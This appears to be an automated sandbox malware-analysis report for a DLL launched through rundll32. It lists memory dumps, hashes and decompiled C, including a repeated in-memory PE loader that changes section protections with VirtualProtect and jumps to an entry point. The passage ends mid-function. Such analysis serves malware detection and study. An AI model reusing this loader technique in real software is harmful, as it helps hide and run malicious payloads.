0x00000000
0x6e9f1fa3
0x6e9f1f77
0x6e9f1f7b
0x6e9f1f0d
0x00000000
0x6e9f1f0d
0x6e9f1f7d
0x6e9f1f7d
0x00000000
0x6e9f1f7d
0x6e9f1f32
0x6e9f1f32
0x6e9f1f34
0x6e9f1f34
0x6e9f1f38
0x6e9f1f3b
0x6e9f1f3e
0x6e9f1f41
0x6e9f1f47
0x6e9f1f4a
0x6e9f1f51
0x6e9f1f54
0x6e9f1f56
0x00000000
0x00000000
0x6e9f1f58
0x6e9f1f59
0x6e9f1f5e
0x6e9f1f60
0x00000000
0x00000000
0x00000000
0x6e9f1f60
0x00000000
0x6e9f1f34
0x6e9f1f10
0x6e9f1ddd
0x6e9f1ddf
0x6e9f1de5
0x6e9f1df6
0x6e9f1df8
0x6e9f1dfa
0x00000000
0x00000000
0x6e9f1e0d
0x6e9f1e0f
0x6e9f1e11
0x00000000
0x00000000
0x6e9f1e17
0x6e9f1e17
0x6e9f1e1e
0x6e9f1e20
0x6e9f1e23
0x6e9f1e25
0x6e9f1de3
0x6e9f1de3
0x6e9f1de3
0x00000000
0x6e9f1de3
0x6e9f1e2a
0x6e9f1e2c
0x00000000
0x00000000
0x6e9f1e2e
0x6e9f1e30
0x00000000
0x00000000
0x6e9f1e3f
0x6e9f1e4f
0x6e9f1e62
0x6e9f1e64
0x6e9f1e66
0x6e9f1e91
0x6e9f1e9a
0x6e9f1eaa
0x6e9f1eac
0x6e9f1eb5
0x6e9f1ebc
0x6e9f1ecc
0x6e9f1ed3
0x6e9f1ed3
0x6e9f1ee2
0x6e9f1eeb
0x6e9f1ef0
0x6e9f1ef4
0x00000000
0x6e9f1ef4
0x6e9f1e73
0x6e9f1e7a
0x6e9f1e8b
0x6e9f1e8d
0x6e9f1e8f
0x00000000
0x00000000
0x00000000
0x6e9f1e8f
0x6e9f1de5
0x00000000
0x6e9f1d82
0x6e9f1d82
0x6e9f1d8c
0x6e9f207d
0x6e9f207d
0x00000000
0x6e9f1d8c

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 941ffda0414a08c2f6419face977a7d5760bd235e66a92f8e6d0c06b18a7fede
Instruction ID: ad4e70ed1216e191aaacaf7a4fe688ea335782e97ecf708b9dacd98fe3c46acd
Opcode Fuzzy Hash: 941ffda0414a08c2f6419face977a7d5760bd235e66a92f8e6d0c06b18a7fede
Instruction Fuzzy Hash: 61A1E1B1208345DFD754DFAAC850BAAB3A9EFD5304F24CD29E59487281EB31D986CF81

Uniqueness

Uniqueness Score: -1.00%

Function 6E9E6D50, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9E6D50() {

				 *0x6e9fd280 = GetUserNameW;
				 *0x6E9FD284 = MessageBoxW;
				 *0x6E9FD288 = GetLastError;
				 *0x6E9FD28C = CreateFileA;
				 *0x6E9FD290 = DebugBreak;
				 *0x6E9FD294 = FlushFileBuffers;
				 *0x6E9FD298 = FreeEnvironmentStringsA;
				 *0x6E9FD29C = GetConsoleOutputCP;
				 *0x6E9FD2A0 = GetEnvironmentStrings;
				 *0x6E9FD2A4 = GetLocaleInfoA;
				 *0x6E9FD2A8 = GetStartupInfoA;
				 *0x6E9FD2AC = GetStringTypeA;
				 *0x6E9FD2B0 = HeapValidate;
				 *0x6E9FD2B4 = IsBadReadPtr;
				 *0x6E9FD2B8 = LCMapStringA;
				 *0x6E9FD2BC = LoadLibraryA;
				 *0x6E9FD2C0 = OutputDebugStringA;
				return 0x6e9fd280;
			}

0x6e9e6d61
0x6e9e6d69
0x6e9e6d6c
0x6e9e6d7b
0x6e9e6d7e
0x6e9e6d8d
0x6e9e6d90
0x6e9e6d9f
0x6e9e6da2
0x6e9e6db1
0x6e9e6db4
0x6e9e6dc3
0x6e9e6dc6
0x6e9e6dd5
0x6e9e6dd8
0x6e9e6de7
0x6e9e6dea
0x6e9e6ded

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 279ed71e1c2ce787cefe81de71b2d421d23a7157b642def83f91bcc40f30fbd9
Instruction ID: 8147fa2385565d7c867585c594a3af80c10d2fd96da49f8932d2082fb299b61e
Opcode Fuzzy Hash: 279ed71e1c2ce787cefe81de71b2d421d23a7157b642def83f91bcc40f30fbd9
Instruction Fuzzy Hash: 1E11DFF4919A00CF8748CF05F1909517BE1BF8F310319819AD80A8B365D7B4A945DF58

Uniqueness

Uniqueness Score: -1.00%

Function 6E9EBB88, Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E9EBB88(intOrPtr* __ecx) {
				void* _t1;
				void* _t2;
				intOrPtr* _t4;

				_t4 = __ecx;
				_t1 = E6E9EC2C4(__ecx);
				if(_t1 == 0) {
					_t2 = E6E9F303C(0xfe338407, 0x77fa1d17);
					if(_t2 != 0) {
						_push( *_t4);
						asm("int3");
						asm("int3");
					}
					 *_t4 = 0;
					return _t2;
				}
				return _t1;
			}

0x6e9ebb89
0x6e9ebb8b
0x6e9ebb92
0x6e9ebb9e
0x6e9ebba5
0x6e9ebba7
0x6e9ebba9
0x6e9ebbaa
0x6e9ebbaa
0x6e9ebbab
0x00000000
0x6e9ebbab
0x6e9ebbb2

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c15a96c7620c44554c4e1fe93e3ccd769cb4049bd096ef4c0d61bc819cc5052
Instruction ID: a1197545d17040ec2e566a44d94773cfcb6317fa0f16e341a24a08313eb755a0
Opcode Fuzzy Hash: 3c15a96c7620c44554c4e1fe93e3ccd769cb4049bd096ef4c0d61bc819cc5052
Instruction Fuzzy Hash: 7DD02231000203A8EF2106E0EA10F01A33C4FC2240F380C2A9E8067D8DDB76C0120911

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 5884 Parent PID: 3104 rundll32.exeCOMMON

Executed Functions

Function 006B2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E006B2062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x6b4418 = 1;
				asm("movaps xmm0, [0x6b3010]");
				asm("movups [0x6b4428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E006B26BF();
				E006B23B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E006B26BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E006B26BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x6b4418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x006b206e
0x006b207c
0x006b2083
0x006b2086
0x006b2090
0x006b2097
0x006b20a1
0x006b20a7
0x006b20b0
0x006b20b9
0x006b20bc
0x006b20c2
0x006b20c6
0x006b20ce
0x006b20d5
0x006b20d8
0x006b20db
0x006b20de
0x006b20e1
0x006b20fb
0x006b2101
0x006b2104
0x006b210c
0x006b2110
0x006b2113
0x006b2116
0x006b2119
0x006b211c
0x006b2138
0x006b2155
0x006b217a
0x006b217c
0x006b2185
0x006b2188
0x006b2192
0x006b2195
0x006b2198
0x006b219b
0x006b219e
0x006b236f
0x006b236f
0x006b22ce
0x006b22d4
0x006b21a9
0x006b21b7
0x006b21bf
0x006b21c2
0x006b21c4
0x006b21ca
0x006b21d6
0x006b21d9
0x006b21dc
0x006b21df
0x006b23b1
0x006b23b1
0x006b22ef
0x006b22f5
0x006b22fb
0x006b2301
0x006b2307
0x006b230d
0x006b2313
0x006b2316
0x006b2319
0x006b2321
0x006b2329
0x006b232f
0x006b2335
0x006b233b
0x006b2341
0x006b234f
0x006b22bb
0x006b22c1
0x006b22c1
0x006b22da
0x006b238e
0x006b2394
0x006b21ea
0x006b21ea
0x006b2204
0x006b2229
0x006b2238
0x006b223b
0x006b223f
0x006b2243
0x006b224a
0x006b2250
0x006b2252
0x006b225b
0x006b226c
0x006b2272
0x006b2278
0x006b227b
0x00000000
0x00000000
0x006b2281
0x00000000
0x006b21ea
0x006b22aa

APIs

VirtualProtect.KERNELBASE ref: 006B20E1
VirtualProtect.KERNELBASE ref: 006B217A

Strings

\, xrefs: 006B2321

Memory Dump Source

Source File: 00000008.00000002.688263779.00000000006B0000.00000040.00000010.sdmp, Offset: 006B0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 2a9a06a9413f9361eb05a3bdadc7272e218f9aab689e84f8249108d880be3308
Instruction ID: 5d2acbec8165dec13093d357652c0bf07236b0fad401b74f16bd7b5c4d2f11ab
Opcode Fuzzy Hash: 2a9a06a9413f9361eb05a3bdadc7272e218f9aab689e84f8249108d880be3308
Instruction Fuzzy Hash: 7291BCB4E042198FDB04DFA9C590A9DFBF1FF48310F25816AE958AB352D334A991CF91

Uniqueness

Uniqueness Score: -1.00%

Function 006B21EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 006B2250

Strings

\, xrefs: 006B2321

Memory Dump Source

Source File: 00000008.00000002.688263779.00000000006B0000.00000040.00000010.sdmp, Offset: 006B0000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 8546a94999460420f719ecb5bc40d3f7e26e769ac9d8cd7efccc814a0c11f2ac
Instruction ID: d27103019c0f961207d918bd9b6d07e33a39f4807482d2abe409f1c10e204670
Opcode Fuzzy Hash: 8546a94999460420f719ecb5bc40d3f7e26e769ac9d8cd7efccc814a0c11f2ac
Instruction Fuzzy Hash: E451BFB5E006298FCB14CF59C980A9DFBF1BF88310F6581A9D958A7312D730AE91CF90

Uniqueness

Uniqueness Score: -1.00%

Function 006B1E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 006B1F29

Memory Dump Source

Source File: 00000008.00000002.688263779.00000000006B0000.00000040.00000010.sdmp, Offset: 006B0000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 1e49b5f9d7a7972badc23272b9373666002bae88d7022b2c4e010ce90d370d3a
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: EC41C1B1E0421A9FDB44DFA8C4906AEBBF1FF48310F14856EE848AB341D375A881CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6488 Parent PID: 3104 rundll32.exeCOMMON

Executed Functions

Function 03222062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E03222062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x3224418 = 1;
				asm("movaps xmm0, [0x3223010]");
				asm("movups [0x3224428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E032226BF();
				E032223B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E032226BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E032226BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x3224418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
						_t223 = _v144 + 1;
						_v148 = _t180;
						_v136 = _t223;
						_v132 = _v140 + 0x28;
						if(_t223 == _v64) {
							goto L2;
						}
					}
					goto L2;
				}
				return 1;
			}

0x0322206e
0x0322207c
0x03222083
0x03222086
0x03222090
0x03222097
0x032220a1
0x032220a7
0x032220b0
0x032220b9
0x032220bc
0x032220c2
0x032220c6
0x032220ce
0x032220d5
0x032220d8
0x032220db
0x032220de
0x032220e1
0x032220fb
0x03222101
0x03222104
0x0322210c
0x03222110
0x03222113
0x03222116
0x03222119
0x0322211c
0x03222138
0x03222155
0x0322217a
0x0322217c
0x03222185
0x03222188
0x03222192
0x03222195
0x03222198
0x0322219b
0x0322219e
0x0322236f
0x0322236f
0x032222ce
0x032222d4
0x032221a9
0x032221b7
0x032221bf
0x032221c2
0x032221c4
0x032221ca
0x032221d6
0x032221d9
0x032221dc
0x032221df
0x032223b1
0x032223b1
0x032222ef
0x032222f5
0x032222fb
0x03222301
0x03222307
0x0322230d
0x03222313
0x03222316
0x03222319
0x03222321
0x03222329
0x0322232f
0x03222335
0x0322233b
0x03222341
0x0322234f
0x032222bb
0x032222c1
0x032222c1
0x032222da
0x0322238e
0x03222394
0x032221ea
0x032221ea
0x03222204
0x03222229
0x03222238
0x0322223b
0x0322223f
0x03222243
0x0322224a
0x03222250
0x03222252
0x0322225b
0x0322226c
0x03222272
0x03222278
0x0322227b
0x00000000
0x00000000
0x03222281
0x00000000
0x032221ea
0x032222aa

APIs

VirtualProtect.KERNELBASE ref: 032220E1
VirtualProtect.KERNELBASE ref: 0322217A

Strings

\, xrefs: 03222321

Memory Dump Source

Source File: 0000000C.00000002.686088603.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: c9803c4ca9951df1a65740d0ebcb6072f4610fafaa98e50a296532afc21ebc0f
Instruction ID: e3161c830728c4f5b2ebd2ff5782d2a4b7959920919ca567e3f4d53d166da1e3
Opcode Fuzzy Hash: c9803c4ca9951df1a65740d0ebcb6072f4610fafaa98e50a296532afc21ebc0f
Instruction Fuzzy Hash: C791BAB4E10318DFCB54DF98C980A9DBBF0BF48300F25856AE958AB351D335A981CF91

Uniqueness

Uniqueness Score: -1.00%

Function 032221EA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 03222250

Strings

\, xrefs: 03222321

Memory Dump Source

Source File: 0000000C.00000002.686088603.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: ProtectVirtual
String ID: \
API String ID: 544645111-2967466578
Opcode ID: 1cbb2e71bdeb12e65798b180a13321d69a110d2f6729f950cb8bf10032f9f461
Instruction ID: a1300307726a10c1245bdb77982c825f6d2f505639e9d9b1bc7858bfa07aa5f0
Opcode Fuzzy Hash: 1cbb2e71bdeb12e65798b180a13321d69a110d2f6729f950cb8bf10032f9f461
Instruction Fuzzy Hash: D951AEB5E10229DFCB24CF59C980A9DBBF1BF88310F2585A9D958A7311D731A991CF90

Uniqueness

Uniqueness Score: -1.00%

Function 03221E9D, Relevance: 1.4, APIs: 1, Instructions: 107memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 03221F29

Memory Dump Source

Source File: 0000000C.00000002.686088603.0000000003220000.00000040.00000001.sdmp, Offset: 03220000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction ID: 4679b1bc37743993ca4a19f45fac50255a9d629ac39de7f0729b7e5820ea2689
Opcode Fuzzy Hash: b558d26ddbb39b044a5e6b57bf5fb445094d5c6a949ff0af454b530fa9178597
Instruction Fuzzy Hash: 7541C5B5E142199FDB04DF98C890AAEBBF1FF48310F15856DE448AB340D775A851CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 6552 Parent PID: 3104 rundll32.exeCOMMON

Executed Functions

Function 003A2062, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E003A2062(long __ebx, void* __edi, long __esi, intOrPtr _a4) {
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				void* _v72;
				char* _v76;
				int _v80;
				long _v84;
				long _v88;
				DWORD* _v92;
				intOrPtr _v96;
				int _v100;
				intOrPtr* _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				void* _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _v148;
				intOrPtr _v152;
				char* _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char* _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				char _v184;
				intOrPtr _t139;
				int _t147;
				int _t155;
				int _t159;
				intOrPtr _t174;
				int _t180;
				intOrPtr _t223;
				void* _t230;
				intOrPtr _t233;
				void* _t240;
				intOrPtr _t244;
				intOrPtr _t255;
				intOrPtr _t266;
				DWORD* _t268;
				void* _t272;
				intOrPtr* _t275;
				intOrPtr* _t276;

				_t139 = _a4;
				_v20 = 0;
				_t240 =  *((intOrPtr*)(_t139 + 4));
				 *0x3a4418 = 1;
				asm("movaps xmm0, [0x3a3010]");
				asm("movups [0x3a4428], xmm0");
				_v48 = _t139;
				_v52 =  *((intOrPtr*)(_t139 + 0x58));
				_v56 =  *((intOrPtr*)(_v48 + 0x38));
				_v184 = _t240;
				_v60 =  *((intOrPtr*)(_v48 + 0x2c));
				_v180 = _v56;
				_v176 = 4;
				_v172 =  &_v20;
				_v64 =  *((intOrPtr*)(_t139 + 0x50));
				_v68 = 4;
				_v72 = _t240;
				_v76 =  &_v20;
				_t147 = VirtualProtect(__edi, __ebx, __esi, _t268); // executed
				_v80 = _t147;
				_v184 = _v72;
				_v180 = 0;
				_v176 =  *((intOrPtr*)(_v48 + 0x38));
				_v84 = 0x400;
				_v88 = 2;
				_v92 =  &_v20;
				_v96 = 0;
				E003A26BF();
				E003A23B9(_v72,  *((intOrPtr*)(_v48 + 0x30)), _v60);
				E003A26BF( *((intOrPtr*)(_v48 + 0x30)), 0, _v60);
				_t155 = VirtualProtect(_v72, 0x400, 2, _v92); // executed
				_t275 = _t272 - 0x88;
				_t230 = _v72;
				_t255 =  *((intOrPtr*)(_t230 + 0x3c));
				_v100 = _t155;
				_v104 = _v72 + 0x3c;
				_v108 = _t230;
				_v112 = _t255;
				if(_t255 != 0) {
					_v108 = _v72 + (_v112 + 0x0000ffff & 0x0000ffff) + 1;
				}
				_v152 = _v108;
				if(_v64 == 0) {
					L2:
					 *_t275 = _v72;
					_v116 = _v72 +  *((intOrPtr*)(_v48 + 0x24));
					_t159 = DisableThreadLibraryCalls(??);
					_t276 = _t275 - 4;
					_t233 =  *_v104;
					_v120 = _t159;
					_v124 = _t233;
					_v128 = _v72;
					if(_t233 != 0) {
						_v128 = _v72 + (_v124 + 0x0000ffff & 0x0000ffff) + 1;
					}
					_t244 = _v48;
					_v44 =  *((intOrPtr*)(_t244 + 0x40));
					_v40 =  *((intOrPtr*)(_t244 + 0x54));
					_v36 =  *((intOrPtr*)(_t244 + 0x44));
					_v32 =  *((intOrPtr*)(_t244 + 0x18));
					_v28 =  *((intOrPtr*)(_t244 + 0x34));
					_v24 = _v116;
					 *_t276 = _t244;
					_v184 = 0;
					_v180 = 0x5c;
					_v156 =  &_v44;
					_v160 = 0;
					_v164 = 0x5c;
					_v168 =  *((intOrPtr*)(_v128 + 0x28));
					E003A26BF();
					if(_v168 != 0) {
						_t275 =  *((intOrPtr*)( &_v44 + 0x10));
						goto __eax;
					}
				} else {
					_v136 = 0;
					_v132 = _v152 + 0x18 + ( *(_v152 + 0x14) & 0x0000ffff);
					while(1) {
						_t174 = _v132;
						_v140 = _t174;
						_t266 = _v140;
						_v184 = _v72 +  *((intOrPtr*)(_t266 + 0xc));
						_v180 =  *((intOrPtr*)(_t266 + 8));
						_v176 =  *((intOrPtr*)(0x3a4418 + (( *(_t174 + 0x24) >> 0x0000001e & 0x00000001) << 4) + ( *(_t174 + 0x24) >> 0x1f << 3) + (( *(_t174 + 0x24) >> 0x0000001d & 0x00000001) << 2)));
						_v172 =  &_v20;
						_v144 = _v136;
						_t180 = VirtualProtect(??, ??, ??, ??); // executed
						_t275 = _t275 - 0x10;
